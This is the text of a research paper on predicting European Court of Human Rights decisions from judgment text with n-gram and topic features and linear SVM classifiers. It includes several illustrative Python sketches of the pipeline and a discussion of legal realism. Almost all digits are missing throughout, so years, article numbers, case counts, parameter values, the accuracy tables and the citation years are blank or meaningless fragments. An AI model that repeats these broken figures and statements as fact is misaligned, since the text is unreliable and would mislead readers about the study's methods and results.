more recent research shows that information from texts authored by amici curiae improves models for predicting the votes of the us supreme court judges (sim, routledge & smith, ). also, a text mining approach utilises sources of metadata about judge’s votes to estimate the degree to which those votes are about common issues (lauderdale & clark, ). accordingly, this paper presents the first systematic study on predicting the decision outcome of cases tried at a major international court by mining the available textual information. aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / echtr provisional annual report for the year : http://www.echr.coe.int/ documents/annual_report_ _eng. pdf. hudoc echr database: http://hudoc. echr.coe.int/. nonetheless, not all cases that pass this first admissibility stage are decided in the same way. while the individual judge’s decision on admissibility is final and does not comprise the obligation to provide reasons, a committee deciding a case may, by unanimous vote, declare the application admissible and render a judgment on its merits, if the legal issue raised by the application is covered by well-established case-law by the court. overall, we believe that building a text-based predictive system of judicial decisions can offer lawyers and judges a useful assisting tool. the system may be used to rapidly identify cases and extract patterns that correlate with certain outcomes. it can also be used to develop prior indicators for diagnosing potential violations of specific articles in lodged applications and eventually prioritise the decision process on cases where violation seems very likely. this may improve the significant delay imposed by the court and encourage more applications by individuals who may have been discouraged by the expected time delays. materials and methods european court of human rights the ecthr is an international court set up in by the echr. the court has jurisdiction to rule on the applications of individuals or sovereign states alleging violations of the civil and political rights set out in the convention. the echr is an international treaty for the protection of civil and political liberties in european democracies committed to the rule of law. the treaty was initially drafted in by the ten states which had created the council of europe in the previous year. membership in the council entails becoming party to the convention and all new members are expected to ratify the echr at the earliest opportunity. the convention itself entered into force in . since , the council of europe and thus the convention have expanded significantly to embrace forty-seven states in total, with a combined population of nearly million. since , the court has sat as a full-time court and individuals can apply to it directly, if they can argue that they have voiced their human rights grievance by exhausting all effective remedies available to them in their domestic legal systems before national courts. case processing by the court the vast majority of applications lodged with the court are made by individuals. applications are first assessed at a prejudicial stage on the basis of a list of admissibility criteria. the criteria pertain to a number of procedural rules, chief amongst which is the one on the exhaustion of effective domestic remedies. 
if the case passes this first stage, it can either be allocated to a single judge, who may declare the application inadmissible and strike it out of the court’s list of cases, or be allocated to a committee or a chamber. a large number of the applications, according to the court’s statistics fail this first admissibility stage. thus, to take a representative example, according to the court’s provisional annual report for the year , applications were declared inadmissible or struck out of the list by chambers, approximately , by committees and some , by single judges. to these correspond, for the same year, judgments on the merits. moreover, cases held inadmissible or struck out are not reported, which entails that a text-based predictive analysis of them is impossible. it is important to keep this point in mind, since our analysis was solely performed on cases retrievable through the electronic database of the court, hudoc. the cases analysed are thus the ones that have already passed the first admissibility stage, with the consequence that the court decided on these cases’ merits under one of its formations. aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / rules of ecthr, http://www.echr.coe.int/ documents/rules_court_eng.pdf. main premise our main premise is that published judgments can be used to test the possibility of a text-based analysis for ex ante predictions of outcomes on the assumption that there is enough similarity between (at least) certain chunks of the text of published judgments and applications lodged with the court and/or briefs submitted by parties with respect to pending cases. predictive tasks were based on the text of published judgments rather than lodged applications or briefs simply because we did not have access to the relevant data set. we thus used published judgments as proxies for the material to which we do not have access. this point should be borne in mind when approaching our results. at the very least, our work can be read in the following hypothetical way: if there is enough similarity between the chunks of text of published judgments that we analyzed and that of lodged applications and briefs, then our approach can be fruitfully used to predict outcomes with these other kinds of texts. case structure the judgments of the court have a distinctive structure, which makes them particularly suitable for a text-based analysis. according to rule of the rules of the court, a judgment contains (among other things) an account of the procedure followed on the national level, the facts of the case, a summary of the submissions of the parties, which comprise their main legal arguments, the reasons in point of law articulated by the court and the operative provisions. judgments are clearly divided into different sections covering these contents, which allows straightforward standardisation of the text and consequently renders possible text-based analysis. more specifically, the sections analysed in this paper are the following: • procedure: this section contains the procedure followed before the court, from the lodging of the individual application until the judgment was handed down. • the facts: this section comprises all material which is not considered as belonging to points of law, i.e., legal arguments. it is important to stress that the facts in the above sense do not just refer to actions and events that happened in the past as these have been formulated by the court, giving rise to an alleged violation of a convention article. 
the ‘facts’ section is divided in the following subsections: – the circumstances of the case: this subsection has to do with the factual background of the case and the procedure (typically) followed before domestic courts before the application was lodged by the court. this is the part that contains materials relevant to the individual applicant’s story in its dealings with the respondent state’s authorities. it comprises a recounting of all actions and events that have allegedly given rise to a violation of the echr. with respect to this subsection, a number of crucial clarifications and caveats should be stressed. to begin with, the text of the ‘circumstances’ subsection has been formulated by the court itself. as a result, it should not always be understood as a neutral mirroring of the factual background of the case. the choices made by the court when it comes to formulations of the facts incorporate implicit or explicit judgments to the effect that some facts are more aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / relevant than others. this leaves open the possibility that the formulations used by the court may be tailor-made to fit a specific preferred outcome. we openly acknowledge this possibility, but we believe that there are several ways in which it is mitigated. first, the ecthr has limited fact-finding powers and, in the vast majority of cases, it defers, when summarizing the factual background of a case, to the judgments of domestic courts that have already heard and dismissed the applicants’ echr-related complaint (leach, paraskeva & uelac, ; leach, ). while domestic courts do not necessarily hear complaints on the same legal issues as the ecthr does, by virtue of the incorporation of the convention by all states parties (helfer, ), they typically have powers to issue judgments on echr-related issues. domestic judgments may also reflect assumptions about the relevance of various events, but they also provide formulations of the facts that have been validated by more than one decision-maker. second, the court cannot openly acknowledge any kind of bias on its part. this means that, on their face, summaries of facts found in the ‘circumstances’ section have to be at least framed in as neutral and impartial a way as possible. as a result, for example, clear displays of impartiality, such as failing to mention certain crucial events, seem rather improbable. third, a cursory examination of many ecthr cases indicates that, in the vast majority of cases, parties do not seem to dispute the facts themselves, as contained in the ‘circumstances’ subsection, but only their legal significance (i.e., whether a violation took place or not, given those facts). as a result, the ‘circumstances’ subsection contains formulations on which, in the vast majority of cases, disputing parties agree. last, we hasten to add that the above three kinds of considerations do not logically entail that other forms of non-outright or indirect bias in the formulation of facts are impossible. however, they suggest that, in the absence of access to other kinds of textual data, such as lodged applications and briefs, the ‘circumstances’ subsection can reasonably perform the function of a (sometimes crude) proxy for a textual representation of the factual background of a case. – relevant law: this subsection of the judgment contains all legal provisions other than the articles of the convention that can be relevant to deciding the case. 
these are mostly provisions of domestic law, but the court also frequently invokes other pertinent international or european treaties and materials. • the law: the law section considers the merits of the case, through the use of legal argument. depending on the number of issues raised by each application, the section is further divided into subsections that examine individually each alleged violation of some convention article (see below). however, the court in most cases refrains from examining all such alleged violations in detail. insofar as the same claims can be made by invoking more than one article of the convention, the court frequently decides only those that are central to the arguments made. moreover, the court frequently refrains from deciding on an alleged violation of an article if it overlaps sufficiently with some other violation it has already decided on. – alleged violation of article x: each subsection of the judgment examining alleged violations in depth is divided into two sub-sections. the first one contains the parties' submissions. the second one comprises the arguments made by the court itself on the merits. ∗ parties' submissions: the parties' submissions typically summarise the main arguments made by the applicant and the respondent state. since in the vast majority of cases the material facts are taken for granted, having been authoritatively established by domestic courts, this part has almost exclusively to do with the legal arguments used by the parties. ∗ merits: this subsection provides the legal reasons that purport to justify the specific outcome reached by the court. typically, the court places its reasoning within a wider set of rules, principles and doctrines that have already been established in its past case-law and attempts to ground the decision by reference to these. it is to be expected, then, that this subsection refers almost exclusively to legal arguments, sometimes mingled with bits of factual information repeated from previous parts. • operative provisions: this is the section where the court announces the outcome of the case, which is a decision to the effect that a violation of some convention article either did or did not take place. sometimes it is coupled with a decision on the division of legal costs and, much more rarely, with an indication of interim measures, under article of the echr. figures – show extracts of the procedure, facts, law and operative provisions sections from the case of "velcheva v. bulgaria" (http://hudoc.echr.coe.int/sites/eng/pages/search.aspx?i= - ), following the structure described above. data we create a data set consisting of cases related to articles , , and of the convention (the data set is publicly available for download from https://figshare.com/s/ f d e c ff ). we focus on these three articles for two main reasons. first, these articles provided the most data we could automatically scrape. second, it is of crucial importance that there should be a sufficient number of cases available, in order to test the models. cases from the selected articles fulfilled both criteria. table shows the convention right that each article protects and the number of cases in our data set.
table articles of the convention and number of cases in the data set. article numbers, the convention right that each article protects and the number of cases in our data set.
article | human right | cases
 | prohibits torture and inhuman and degrading treatment |
 | protects the right to a fair trial |
 | provides a right to respect for one's "private and family life, his home and his correspondence" |
for each article, we first retrieve all the cases available in hudoc. then, we keep only those that are in english and parse them following the case structure presented above. we then select an equal number of violation and non-violation cases for each particular article of the convention. to achieve a balanced number of violation/non-violation cases, we first count the number of cases available in each class. then, we choose all the cases in the smaller class and randomly select an equal number of cases from the larger class. this results in a total of , and cases for articles , and , respectively. finally, we extract the text under each part of the case by using regular expressions, making sure that any sections on the operative provisions of the court are excluded. in this way, we ensure that the models do not use information pertaining to the outcome of the case. we also preprocess the text by lower-casing and removing stop words (i.e., frequent words that do not carry significant semantic information) using the list provided by nltk (https://raw.githubusercontent.com/nltk/nltk_data/ghpages/packages/corpora/stopwords.zip). description of textual features we derive textual features from the text extracted from each section (or subsection) of each case. these are either n-gram features, i.e., contiguous word sequences, or word clusters, i.e., abstract semantic topics. • n-gram features: the bag-of-words (bow) model (salton, wong & yang, ; salton & mcgill, ) is a popular semantic representation of text used in nlp and information retrieval. in a bow model, a document (or any text) is represented as the bag (multiset) of its words (unigrams) or n-grams without taking into account grammar, syntax and word order. this results in a vector space representation where documents are represented as m-dimensional variables over a set of m n-grams. n-gram features have been shown to be effective in various supervised learning tasks (bamman, eisenstein & schnoebelen, ; lampos & cristianini, ). for each set of cases in our data set, we compute the top- most frequent n-grams where n ∈ { , , , }. each feature represents the normalized frequency of a particular n-gram in a case or a section of a case. this can be considered as a feature matrix c ∈ R^{c×m}, where c is the number of the cases and m = , . we extract n-gram features for the procedure (procedure), circumstances (circumstances), facts (facts), relevant law (relevant law), law (law) and the full case (full), respectively. note that the representation of the facts is obtained by taking the mean vector of circumstances and relevant law. in a similar way, the representation of the full case is computed by taking the mean vector of all of its sub-parts.
• topics: we create topics for each article by clustering together n-grams that are semantically similar, leveraging the distributional hypothesis suggesting that similar words appear in similar contexts. we thus use the c feature matrix (see above), which is a distributional representation (turney & pantel, ) of the n-grams given the case as the context; each column vector of the matrix represents an n-gram. using this vector representation of words, we compute n-gram similarity using the cosine metric and create an n-gram by n-gram similarity matrix. we finally apply spectral clustering (von luxburg, ), which performs graph partitioning on the similarity matrix, to obtain clusters of n-grams. for articles and , we use the article data for selecting the number of clusters t, where t = { , ,..., }, while for article we use article . given that the obtained topics are hard clusters, an n-gram can only be part of a single topic. a representation of a cluster is derived by looking at the most frequent n-grams it contains. the main advantages of using topics (sets of n-grams) instead of single n-grams are that they reduce the dimensionality of the feature space, which is essential for feature selection, limit overfitting to the training data (lampos et al., ; preoţiuc-pietro, lampos & aletras, ; preoţiuc-pietro et al., ) and also provide a more concise semantic representation. classification model the problem of predicting the decisions of the ecthr is defined as a binary classification task. our goal is to predict if, in the context of a particular case, there is a violation or non-violation in relation to a specific article of the convention. for that purpose, we use each set of textual features, i.e., n-grams and topics, to train support vector machine (svm) classifiers (vapnik, ). an svm is a machine learning algorithm that has shown particularly good results in text classification, especially using small data sets (joachims, ; wang & manning, ). we employ a linear kernel since that allows us to identify important features that are indicative of each class by looking at the weight learned for each feature (chang & lin, ). we label all the violation cases as + , while no violation is denoted by − . therefore, features assigned with positive weights are more indicative of violation, while features with negative weights are more indicative of no violation. the models are trained and tested by applying a stratified -fold cross-validation, which uses a held-out % of the data at each stage to measure predictive performance. the linear svm has a regularisation parameter c for the error term, which is tuned using grid search. for articles and , we use the article data for parameter tuning, while for article we use article . the sketches below illustrate the data preparation, the n-gram and topic features, and the classification setup described in this section.
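the class balancing and outcome-text filtering described in the data subsection can be illustrated with a short python sketch. this is a minimal reconstruction under stated assumptions, not the authors' actual scraping code: the record layout, the fixed random seed and the heading pattern used to cut off the operative provisions are all illustrative.

```python
import random
import re

def balance_cases(cases):
    """undersample the larger class so that violation (label +1) and
    non-violation (label -1) cases are equally represented."""
    violations = [c for c in cases if c["label"] == 1]
    non_violations = [c for c in cases if c["label"] == -1]
    smaller, larger = sorted([violations, non_violations], key=len)
    random.seed(0)  # assumption: any fixed seed, only for reproducibility
    return smaller + random.sample(larger, len(smaller))

def drop_operative_provisions(case_text):
    """keep only the text before the operative provisions, so the model
    never sees the part of the judgment that states the outcome.
    the heading pattern below is a guess at how that section opens."""
    return re.split(r"for these reasons, the court", case_text,
                    flags=re.IGNORECASE)[0]
```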
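a sketch of the n-gram features described above, using scikit-learn's CountVectorizer together with nltk's english stop-word list. the n-gram range and vocabulary size are placeholders because the exact values are elided in this text, and dividing each row by its total count is one reasonable reading of the "normalized frequency" of an n-gram.

```python
import numpy as np
from nltk.corpus import stopwords
from sklearn.feature_extraction.text import CountVectorizer

def ngram_matrix(section_texts, max_features=2000):
    """build the cases-by-ngrams matrix c of normalized n-gram frequencies;
    section_texts holds one string per case (e.g., its 'circumstances' text)."""
    vectorizer = CountVectorizer(
        lowercase=True,
        stop_words=stopwords.words("english"),
        ngram_range=(1, 4),         # assumption: n in {1, 2, 3, 4}
        max_features=max_features,  # assumption: top-N most frequent n-grams
    )
    counts = vectorizer.fit_transform(section_texts).toarray().astype(float)
    totals = counts.sum(axis=1, keepdims=True)
    totals[totals == 0] = 1.0       # guard against empty sections
    return counts / totals, vectorizer.get_feature_names_out()

# the 'facts' and 'full' representations are mean vectors of their sub-parts,
# e.g. facts = (circumstances + relevant_law) / 2.0
```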
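a sketch of the topic construction described above: n-grams are represented by the columns of the feature matrix, pairwise cosine similarities form the n-gram by n-gram similarity matrix, and spectral clustering partitions that graph into hard clusters. the number of clusters is a placeholder (in the paper it is selected on a held-out article), and summing the frequencies of each n-gram cluster per case is only one plausible way to turn the hard clusters into case-level topic features.

```python
import numpy as np
from sklearn.cluster import SpectralClustering
from sklearn.metrics.pairwise import cosine_similarity

def ngram_topics(c_matrix, n_clusters=30):
    """cluster n-grams into hard topics and aggregate them per case;
    c_matrix is the cases-by-ngrams matrix of normalized frequencies."""
    similarity = cosine_similarity(c_matrix.T)   # n-gram by n-gram similarity
    similarity = np.clip(similarity, 0.0, None)  # affinity must be non-negative
    labels = SpectralClustering(
        n_clusters=n_clusters,       # assumption: tuned on a held-out article
        affinity="precomputed",
        random_state=0,
    ).fit_predict(similarity)        # hard cluster id per n-gram
    topic_features = np.zeros((c_matrix.shape[0], n_clusters))
    for topic_id in range(n_clusters):
        topic_features[:, topic_id] = c_matrix[:, labels == topic_id].sum(axis=1)
    return topic_features, labels
```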
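a sketch of the classification setup described above: a linear-kernel svm evaluated with stratified cross-validation, the penalty parameter c chosen by grid search, and an inspection of the learned weights to see which features point towards violation (+1) or no violation (-1). the fold count and the c grid are placeholders for the elided values, and for self-containedness the grid search is nested inside the cross-validation rather than tuned on a separate article as in the paper.

```python
import numpy as np
from sklearn.model_selection import GridSearchCV, StratifiedKFold, cross_val_score
from sklearn.svm import SVC

def mean_accuracy(X, y, c_grid=(0.01, 0.1, 1.0, 10.0), n_folds=10):
    """mean accuracy of a linear svm under stratified k-fold cross-validation;
    y holds +1 for violation and -1 for no violation."""
    model = GridSearchCV(
        SVC(kernel="linear"),
        param_grid={"C": list(c_grid)},  # assumption: illustrative grid
        cv=StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=0),
    )
    scores = cross_val_score(
        model, X, y,
        cv=StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=1),
    )
    return scores.mean(), scores.std()

def most_predictive_features(X, y, feature_names, k=10):
    """rank features by the weight of a linear svm fitted on all data:
    large positive weights indicate violation, large negative weights
    indicate no violation."""
    weights = SVC(kernel="linear", C=1.0).fit(X, y).coef_.ravel()
    order = np.argsort(weights)
    violation = [feature_names[i] for i in order[::-1][:k]]
    no_violation = [feature_names[i] for i in order[:k]]
    return violation, no_violation
```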
results and discussion predictive accuracy we compute the predictive performance of both sets of features on the classification of the ecthr cases. performance is computed as the mean accuracy obtained by -fold cross-validation. accuracy is computed as follows: accuracy = (tv + tnv) / (v + nv), where tv and tnv are the number of cases correctly classified as a violation or a non-violation of an article of the convention, respectively, and v and nv represent the total number of cases where there is a violation or no violation, respectively. table shows the accuracy of each set of features across articles using a linear svm. the rightmost column also shows the mean accuracy across the three articles.
table accuracy of the different feature types across articles. accuracy of predicting violation/non-violation of cases across articles on -fold cross-validation using an svm with a linear kernel. parentheses contain the standard deviation from the mean. accuracy of a random guess is . . bold font denotes the best accuracy in a particular article or on average across articles.
feature type | article | article | article | average
n-grams: full | . (. ) | . (. ) | . (. ) | .
n-grams: procedure | . (. ) | . (. ) | . (. ) | .
n-grams: circumstances | . (. ) | . (. ) | . (. ) | .
n-grams: relevant law | . (. ) | . (. ) | . (. ) | .
n-grams: facts | . (. ) | . (. ) | . (. ) | .
n-grams: law | . (. ) | . (. ) | . (. ) | .
topics | . (. ) | . (. ) | . (. ) | .
topics and circumstances | . (. ) | . (. ) | . (. ) | .
in general, both n-gram and topic features achieve good predictive performance. our main observation is that both language use and topicality are important factors that appear to stand as reliable proxies of judicial decisions. therefore, we take a further look into the models by attempting to interpret the differences in accuracy. we observe that 'circumstances' is the best subsection to predict the decisions for cases in articles and , with a performance of . and . respectively. in article , we obtain better predictive accuracy (. ) using the text extracted from the full case ('full'), while the performance of 'circumstances' is almost comparable (. ). we should again note here that the 'circumstances' subsection contains information regarding the factual background of the case, as this has been formulated by the court. the subsection therefore refers to the actions and events which triggered the case and gave rise to a claim made by an individual to the effect that the echr was violated by some state. on the other hand, 'full', which is a mixture of information contained in all of the sections of a case, surprisingly fails to improve over using only the 'circumstances' subsection. this entails that the factual background contained in the 'circumstances' is the most important textual part of the case when it comes to predicting the court's decision. the other sections and subsections that refer to the facts of a case, namely 'procedure', 'relevant law' and 'facts', achieve somewhat lower performance (. cf. . ), although they remain consistently above chance. recall, at this point, that the 'procedure' subsection consists only of general details about the applicant, such as the applicant's name or country of origin and the procedure followed before domestic courts.
combining the two best performing sets of features (‘circumstances’ and ‘topics’) we achieve the best average classification performance (. ). the combination also yields slightly better performance for articles and while performance marginally drops for article . that is . , . and . for articles , and respectively. discussion the consistently more robust predictive accuracy of the ‘circumstances’ subsection suggests a strong correlation between the facts of a case, as these are formulated by the court in this subsection, and the decisions made by judges. the relatively lower predictive accuracy of the ‘law’ subsection could also be an indicator of the fact that legal reasons and arguments of a case have a weaker correlation with decisions made by the court. however, this last remark should be seriously mitigated since, as we have already observed, many inadmissibility cases do not contain a separate ‘law’ subsection. legal formalism and realism these results could be understood as providing some evidence for judicial decision-making approaches according to which judges are primarily responsive to non-legal, rather than to legal, reasons when they decide appellate cases. without going into details with respect to a particularly complicated debate that is out of the scope of this paper, we may here simplify by observing that since the beginning of the th century, there has been a major contention between two opposing ways of making sense of judicial decision-making: legal formalism and legal realism (posner, ; tamanaha, ; leiter, ). very roughly, legal formalists have provided a legal model of judicial decision-making, claiming that the law is rationally determinate: judges either decide cases deductively, by subsuming facts under formal legal rules or use more complex legal reasoning than deduction whenever legal rules are insufficient to warrant a particular outcome (pound, ; kennedy, ; grey, ; pildes, ). on the other hand, legal realists have criticized formalist models, insisting that judges primarily decide appellate cases by responding to the stimulus of the facts of the case, rather than on the basis of legal rules or doctrine, which are in many occasions rationally indeterminate (llewellyn, ; schauer, ; baum, ; leiter, ; miles & sunstein, ). extensive empirical research on the decision-making processes of various supreme and international courts, and especially the us supreme court, has indicated rather consistently aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / that pure legal models, especially deductive ones, are false as an empirical matter when it comes to cases decided by courts further up the hierarchy. as a result, it is suggested that the best way to explain past decisions of such courts and to predict future ones is by placing emphasis on other kinds of empirical variables that affect judges (baum, ; schauer, ). for example, early legal realists had attempted to classify cases in terms of regularities that can help predict outcomes, in a way that did not reflect standard legal doctrine (llewellyn, ). likewise, the attitudinal model for the us supreme court claims that the best predictors of its decisions are the policy preferences of the justices and not legal doctrinal arguments (segal & spaeth, ). 
in general, and notwithstanding the simplified snapshot of a very complex debate that we just presented, our results could be understood as lending some support to the basic legal realist intuition according to which judges are primarily responsive to non-legal, rather than to legal, reasons when they decide hard cases. in particular, if we accept that the ‘circumstances’ subsection, with all the caveats we have already voiced, is a (crude) proxy for non-legal facts and the ‘law’ subsection is a (crude) proxy for legal reasons and arguments, the predictive superiority of the ‘circumstances’ subsection seems to cohere with extant legal realist treatments of judicial decision-making. however, not more should be read into this than our results allow. first, as we have already stressed at several occasions, the ‘circumstances’ subsection is not a neutral statement of the facts of the case and we have only assumed the similarity of that subsection with analogous sections found in lodged applications and briefs. second, it is important to underline that the results should also take into account the so-called selection effect (priest & klein, ) that pertains to cases judged by the ecthr as an international court. given that the largest percentage of applications never reaches the chamber or, still less, the grand chamber, and that cases have already been tried at the national level, it could very well be the case that the set of ecthr decisions on the merits primarily refers to cases in which the class of legal reasons, defined in a formal sense, is already considered as indeterminate by competent interpreters. this could help explain why judges primarily react to the facts of the case, rather than to legal arguments. thus, further text-based analysis is needed in order to determine whether the results could generalise to other courts, especially to domestic courts deciding echr claims that are placed lower within the domestic judicial hierarchy. third, our discussion of the realism/formalism debate is overtly simplified and does not imply that the results could not be interpreted in a sophisticated formalist way. still, our work coheres well with a bulk of other empirical approaches in the legal realist vein. topic analysis the topics further exemplify this line of interpretation and provide proof of the usefulness of the nlp approach. the linear kernel of the svm model can be used to examine which topics are most important for inferring whether an article of the convention has been violated or not by looking at their weights w. tables – present the six topics for the most positive and negative svm weights for the articles , and , respectively. topics identify in a sufficiently robust manner patterns of fact scenarios that correspond to well-established trends in the court’s case law. aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / note that all the cases used as examples in this section are taken from the data set we used to perform the experiments. table the most predictive topics for article decisions. most predictive topics for article , represented by the most frequent words, listed in order of their svm weight. topic labels are manually added. positive weights (w) denote more predictive topics for violation and negative weights for no violation. 
topic label words w top- violation positive state obligations injury, protection, ordered, damage, civil, caused, failed, claim, course, connection, region, effective, quashed, claimed, suffered, suspended, carry, compensation, pecuniary, ukraine . detention conditions prison, detainee, visit, well, regard, cpt, access, food, situation, problem, remained, living, support, visited, establishment, standard, admissibility merit, overcrowding, contact, good . treatment by state officials police, officer, treatment, police officer, july, ill, force, evidence, ill treatment, arrest, allegation, police station, subjected, arrested, brought, subsequently, allegedly, ten, treated, beaten . top- no violation prior violation of article june, statement, three, dated, car, area, jurisdiction, gendarmerie, perpetrator, scene, june applicant, killing, prepared, bullet, wall, weapon, kidnapping, dated june, report dated, stopped − . issues of proof witness, asked, told, incident, brother, heard, submission, arrived, identity, hand, killed, called, involved, started, entered, find, policeman, returned, father, explained − . sentencing sentence, year, life, circumstance, imprisonment, release, set, president, administration, sentenced, term, constitutional, federal, appealed, twenty, convicted, continued, regime, subject, responsible − . first, topic in table has to do with whether long prison sentences and other detention measures can amount to inhuman and degrading treatment under article . that is correctly identified as typically not giving rise to a violation (european court of human rights, ). for example, cases such as kafkaris v. cyprus ([gc] no. / , echr -i), hutchinson v. uk (no. / of february ) and enea v. italy ([gc], no. / , echr -iv) were identified as exemplifications of this trend. likewise, topic in table has to do with whether certain choices with regard to the social policy of states can amount to a violation of article . that was correctly identified as typically not giving rise to a violation, in line with the court’s tendency to acknowledge a large margin of appreciation to states in this area (greer, ). in this vein, cases such as aune v. norway (no. / of october ) and ball v. andorra (application no. / of december ) are examples of cases where topic is dominant. similar observations apply, among other things, to topics , and . that includes issues with the enforcement of domestic judgments giving rise to a violation of article (kiestra, ). some representative cases are velskaya v. russia, of october and aleksandrova v. russia of december . topic in table is related to lower standard of review when property rights are at play (tsarapatsanis, ). a representative aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / table the most predictive topics for article decisions. most predictive topics for article , represented by the most frequent words, listed in order of their svm weight. topic labels are manually added. positive weights (w) denote more predictive topics for violation and negative weights for no violation. topic label words w top- violation enforcement of domestic judgments and reasonable time appeal, enforcement, damage, instance, dismissed, established, brought, enforcement proceeding, execution, limit, court appeal, instance court, caused, time limit, individual, responsible, receipt, court decision, copy, employee . 
enforcement of domestic judgments and reasonable time court, applicant, article, judgment, case, law, proceeding, application, government, convention, time, article convention, january, human, lodged, domestic, february, september, relevant, represented . enforcement of domestic judgments and reasonable time party, final, respect, set, interest, alleged, general, violation, entitled, complained, obligation, read, fair, final judgment, violation article, served, applicant complained, summons, convention article, fine . top- no violation criminal limb defendant, detention, witness, cell, counsel, condition, defence, court upheld, charged, serious, regional court upheld, pre, remand, inmate, pre trial, extended, detained, temporary, defence counsel, metre − . criminal limb procedure, judge, fact, federal, justice, reason, charge, point, criminal procedure, code criminal, code criminal procedure, result, pursuant, article code, lay, procedural, point law, indictment, lay judge, argued, appeal point law − . property rights and claims by companies compensation, company, property, examined, cassation, rejected, declared, owner, deputy, tula, returned, duly, enterprise, moscow, foreign, appears, control, violated, absence, transferred − . case here is oao plodovaya kompaniya v. russia of june . consequently, the topics identify independently well-established trends in the case law without recourse to expert legal/doctrinal analysis. the above observations require to be understood in a more mitigated way with respect to a (small) number of topics. for instance, most representative cases for topic in table were not particularly informative. this is because these were cases involving a person’s death, in which claims of violations of article (inhuman and degrading treatment) were only subsidiary: this means that the claims were mainly about article , which protects the right to life. in these cases, the absence of a violation, even if correctly identified, is more of a technical issue on the part of the court, which concentrates its attention on article and rarely, if ever, moves on to consider independently a violation of article . this is exemplified by cases such as buldan v. turkey of april and nuray Şen v. turkey of march , which were, again, correctly identified. on the other hand, cases have been misclassified mainly because their textual information is similar to cases in the opposite class. we observed a number of cases where there is a aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / table the most predictive topics for article decisions. most predictive topics for article , represented by the most frequent words, listed in order of their svm weight. topic labels are manually added. positive weights (w) denote more predictive topics for violation and negative weights for no violation. topic label words w top- violation death and military action son, body, result, russian, department, prosecutor office, death, group, relative, head, described, military, criminal investigation, burial, district prosecutor, men, deceased, town, attack, died . 
unlawful limitation clauses health moral, law democratic, law democratic society, disorder crime, prevention disorder, prevention disorder crime, economic well, protection health, interest national, interest national security, public authority exercise, interference public authority exercise, national security public, exercise law democratic, public authority exercise law, authority exercise law democratic, exercise law, authority exercise law, exercise law democratic society, crime protection . judicial procedure second, instance, second applicant, victim, municipal, violence, authorised, address, municipal court, relevant provision, behaviour, register, appear, maintenance, instance court, defence, procedural, decide, court decided, quashed . top- no violation discretion of state authorities service, obligation, data, duty, review, high, system, test, concern, building, agreed, professional, positive, threat, carry, van, accepted, step, clear, panel − . social policy contact, social, care, expert, opinion, living, welfare, county, physical, psychological, agreement, divorce, restriction, support, live, dismissed applicant, prior, remained, court considered, expressed − . migration cases national, year, country, residence, minister, permit, requirement, netherlands, alien, board, claimed, stay, contrary, objection, spouse, residence permit, close, deputy, deportation, brother − . violation having a very similar feature vector to cases that there is no violation and vice versa. conclusions we presented the first systematic study on predicting judicial decisions of the european court of human rights using only the textual information extracted from relevant sections of ecthr judgments. we framed this task as a binary classification problem, where the training data consists of textual features extracted from given cases and the output is the actual decision made by the judges. apart from the strong predictive performance that our statistical nlp framework achieved, we have reported on a number of qualitative patterns that could potentially drive judicial decisions. more specifically, we observed that the information regarding the aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / factual background of the case as this is formulated by the court in the relevant subsection of its judgments is the most important part obtaining on average the strongest predictive performance of the court’s decision outcome. we suggested that, even if understood only as a crude proxy and with all the caveats that we have highlighted, the rather robust correlation between the outcomes of cases and the text corresponding to fact patterns contained in the relevant subsections coheres well with other empirical work on judicial decision-making in hard cases and backs basic legal realist intuitions. finally, we believe that our study opens up avenues for future work, using different kinds of data (e.g., texts of individual applications, briefs submitted by parties or domestic judgments) coming from various sources (e.g., the european court of human rights, national authorities, law firms). however, data access issues pose a significant barrier for scientists to work on such kinds of legal data. large repositories like hudoc, which are easily and freely accessible, are only case law databases. access to other kinds of data, especially lodged applications and briefs, would enable further research in the intersection of legal science and artificial intelligence. 
additional information and declarations funding dpp received funding from templeton religion trust (https://www.templeton.org) grant number: trt- . vl received funding from engineering and physical sciences research council (http://www.epsrc.ac.uk) grant number: ep/k / . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: templeton religion trust: trt- . engineering and physical sciences research council: ep/k / . competing interests nikolaos aletras is an employee of amazon.com, cambridge, uk, but work was completed while at university college london. author contributions • nikolaos aletras and vasileios lampos conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • dimitrios tsarapatsanis conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. aletras etal ( ), peerj comput. sci., doi . /peerj-cs. / • daniel preoţiuc-pietro conceived and designed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: echr dataset: https://figshare.com/s/ f d e c ff . references bamman d, eisenstein j, schnoebelen t. . gender identity and lexical variation in social media. journal of sociolinguistics ( ): – doi . /josl. . baum l. . the puzzle of judicial behavior. university of michigan press. chang y-w, lin c-j. . feature ranking using linear svm. in: wcci causation and prediction challenge, – . european court of human rights. . factsheet on life imprisonment. strasbourg: european court of human rights. available at http://www.echr.coe.int/documents/ fs_life_sentences_eng.pdf . greer sc. . the margin of appreciation: interpretation and discretion under the european convention on human rights, vol. . council of europe. grey tc. . langdell’s orthodoxy. university of pittsburgh law review : – . helfer lr. . redesigning the european court of human rights: embeddedness as a deep structural principle of the european human rights regime. european journal of international law ( ): – doi . /ejil/chn . joachims t. . learning to classify text using support vector machines: methods, theory and algorithms. kluwer academic publishers. kennedy d. . legal formality. the journal of legal studies ( ): – doi . / . keown r. . mathematical models for legal prediction. computer/lj : . kiestra lr. . the impact of the european convention on human rights on private international law. springer. kort f. . predicting supreme court decisions mathematically: a quantitative analysis of the ‘‘right to counsel’’ cases. american political science review ( ): – doi . / . lampos v, aletras n, preoţiuc-pietro d, cohn t. . predicting and characterising user impact on twitter. in: proceedings of the th conference of the european chapter of the association for computational linguistics, – . lampos v, cristianini n. . nowcasting events from the social web with statistical learning. acm transactions on intelligent 